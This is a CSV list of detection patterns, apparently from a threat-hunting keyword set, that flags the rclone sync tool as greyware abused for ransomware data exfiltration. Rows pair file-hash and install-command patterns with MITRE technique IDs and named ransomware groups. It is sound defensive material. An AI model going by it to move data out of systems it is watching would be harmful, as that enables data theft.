"*ceb97d1ab5525c1d833ca8bc63276818ed3065832fc0a23702f308b9a2c256fb*",".{0,1000}ceb97d1ab5525c1d833ca8bc63276818ed3065832fc0a23702f308b9a2c256fb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cec7da1735babcd6cdd3f77e64b1eb14963a3ff3d6da825439e1c1e43dc75007*",".{0,1000}cec7da1735babcd6cdd3f77e64b1eb14963a3ff3d6da825439e1c1e43dc75007.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ced457dd55d9feb120aaf301915be097aab3a0a42e26a9e9f4d3023c1b84cb8a*",".{0,1000}ced457dd55d9feb120aaf301915be097aab3a0a42e26a9e9f4d3023c1b84cb8a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cf1327f3776cf7b4398a7984f602e78cc1976520d018933555c11bf538d21654*",".{0,1000}cf1327f3776cf7b4398a7984f602e78cc1976520d018933555c11bf538d21654.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cf4f53ce90255cd73ce5ad88865cc2239d96f51bd71b4fd109d6d08aabfe1b50*",".{0,1000}cf4f53ce90255cd73ce5ad88865cc2239d96f51bd71b4fd109d6d08aabfe1b50.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cfb47bb4ee8119eaf61f1c2a34226e74af91c22485760bfd1f2209852bfbbf7f*",".{0,1000}cfb47bb4ee8119eaf61f1c2a34226e74af91c22485760bfd1f2209852bfbbf7f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cfb8075c16ed227876a923bbc3c6f5e5311db40f730e2154501512f72a9ad5b2*",".{0,1000}cfb8075c16ed227876a923bbc3c6f5e5311db40f730e2154501512f72a9ad5b2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cfe2c39137630a2138ab970e5313c27210527c0fcbc583f328508d8b956edfb9*",".{0,1000}cfe2c39137630a2138ab970e5313c27210527c0fcbc583f328508d8b956edfb9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*choco install rclone*",".{0,1000}choco\sinstall\srclone.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d000953c31d5c05471066c7b81c33aa3673112fdf9bad30cef57a4561b460c48*",".{0,1000}d000953c31d5c05471066c7b81c33aa3673112fdf9bad30cef57a4561b460c48.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d02ab6045d52ced3ec80848b04e7675a294a62e3c17ad36429470fcb9b7323f6*",".{0,1000}d02ab6045d52ced3ec80848b04e7675a294a62e3c17ad36429470fcb9b7323f6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d034d92ecdfc79741edccb803113dd7af23f5cde96b165d7449d8f7c02b7d6cb*",".{0,1000}d034d92ecdfc79741edccb803113dd7af23f5cde96b165d7449d8f7c02b7d6cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d04968fb362078ad799d7fd6fe84df42901f142a0e381ef0ffe388d97139aafb*",".{0,1000}d04968fb362078ad799d7fd6fe84df42901f142a0e381ef0ffe388d97139aafb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d079a0e04f148d409c460742d2a5d740a0a405f4a77d7cf0878becdcc0488bbd*",".{0,1000}d079a0e04f148d409c460742d2a5d740a0a405f4a77d7cf0878becdcc0488bbd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d0a70241212198566028cd3154c418e35cbe73a6cd22c2d851341e88cb650cb7*",".{0,1000}d0a70241212198566028cd3154c418e35cbe73a6cd22c2d851341e88cb650cb7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d0b5f9eb1f0aee1183c895a01bdb215c86b05c4fee9310c86ea9a9586351b750*",".{0,1000}d0b5f9eb1f0aee1183c895a01bdb215c86b05c4fee9310c86ea9a9586351b750.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d0da5a5a737e7700297a3c419fa167541f5dbbe2572687bd0361f2a804e1aaf4*",".{0,1000}d0da5a5a737e7700297a3c419fa167541f5dbbe2572687bd0361f2a804e1aaf4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d134e9ea2c34c9efb4b500dbe9a7a9647c84a0768ad22c57f10ceaea95521e66*",".{0,1000}d134e9ea2c34c9efb4b500dbe9a7a9647c84a0768ad22c57f10ceaea95521e66.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d1979e633d08e40784a902c1997aadb8288f6d1516c6785b620975e970543a92*",".{0,1000}d1979e633d08e40784a902c1997aadb8288f6d1516c6785b620975e970543a92.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d1b48128fb7f0428f84faab96ada38d68dcadfc58cc4ae31400825d4608e0c5b*",".{0,1000}d1b48128fb7f0428f84faab96ada38d68dcadfc58cc4ae31400825d4608e0c5b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d231120f8c76d0e8ecc92451b7af6dfd4d174b04fa5d863bb59f887de1d6c4fa*",".{0,1000}d231120f8c76d0e8ecc92451b7af6dfd4d174b04fa5d863bb59f887de1d6c4fa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d23d0c1f295a7399114b9a07fa987e7dc216dbe989b5d88530eb01d3c87c9c1f*",".{0,1000}d23d0c1f295a7399114b9a07fa987e7dc216dbe989b5d88530eb01d3c87c9c1f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d26ab2da54512ae49d5e012c9da66eac5b31be0fd3fa9d4856adad8b4fd5dba3*",".{0,1000}d26ab2da54512ae49d5e012c9da66eac5b31be0fd3fa9d4856adad8b4fd5dba3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d2a4c4347120893ff87e7928d1ecd76039e23c29856063ddbb8c7c472e55f2cc*",".{0,1000}d2a4c4347120893ff87e7928d1ecd76039e23c29856063ddbb8c7c472e55f2cc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d2d9182fb399ec0a9af347939104765487ca82200e8d3e5ac873c0f309e29f6c*",".{0,1000}d2d9182fb399ec0a9af347939104765487ca82200e8d3e5ac873c0f309e29f6c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d30c42826f68de8a1df1e86a7caf75b3326ca30f579e1e5c20ad72ade25420a8*",".{0,1000}d30c42826f68de8a1df1e86a7caf75b3326ca30f579e1e5c20ad72ade25420a8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d3643c6685587b7cf9de48ad151df96b861da4d603b2777ab29b2d52f0ffee99*",".{0,1000}d3643c6685587b7cf9de48ad151df96b861da4d603b2777ab29b2d52f0ffee99.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d36f3a1a27095a0f9ff8c069efcc23472d667b75907afa395502cd3deb6d9321*",".{0,1000}d36f3a1a27095a0f9ff8c069efcc23472d667b75907afa395502cd3deb6d9321.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d3ca7fc7741d1c53f23d0412824e565483bca19a43258005abf2f41cb8e19fbc*",".{0,1000}d3ca7fc7741d1c53f23d0412824e565483bca19a43258005abf2f41cb8e19fbc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d3d1b199ed7e63c9deb5ce18c253a8cbe2c79c00f120d8a38fb987bf9add796c*",".{0,1000}d3d1b199ed7e63c9deb5ce18c253a8cbe2c79c00f120d8a38fb987bf9add796c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d3e8653dd2a94a1077031b324abffd914403d8477f16a6240525953af26e8e13*",".{0,1000}d3e8653dd2a94a1077031b324abffd914403d8477f16a6240525953af26e8e13.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d4284fe74349d67fb89076845ce27d80a378d35b76622a57e32581ea1226859f*",".{0,1000}d4284fe74349d67fb89076845ce27d80a378d35b76622a57e32581ea1226859f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d4aad882569aff9ce3278da721369d41d831bb57284c4e40efe0730243b4b84a*",".{0,1000}d4aad882569aff9ce3278da721369d41d831bb57284c4e40efe0730243b4b84a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d4b47cb2d86b693e7999faff18e2d841a65cebfb0b561cf0592de1b596fde0b4*",".{0,1000}d4b47cb2d86b693e7999faff18e2d841a65cebfb0b561cf0592de1b596fde0b4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d4b7b74fc20c86b21e6fd045f0ba717eb40425261428f70501bf226b4ef62cc8*",".{0,1000}d4b7b74fc20c86b21e6fd045f0ba717eb40425261428f70501bf226b4ef62cc8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d516e6b86a3a8b8dd7e5abb426ca435077178539379c2253ba035b0a0b08bc8b*",".{0,1000}d516e6b86a3a8b8dd7e5abb426ca435077178539379c2253ba035b0a0b08bc8b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
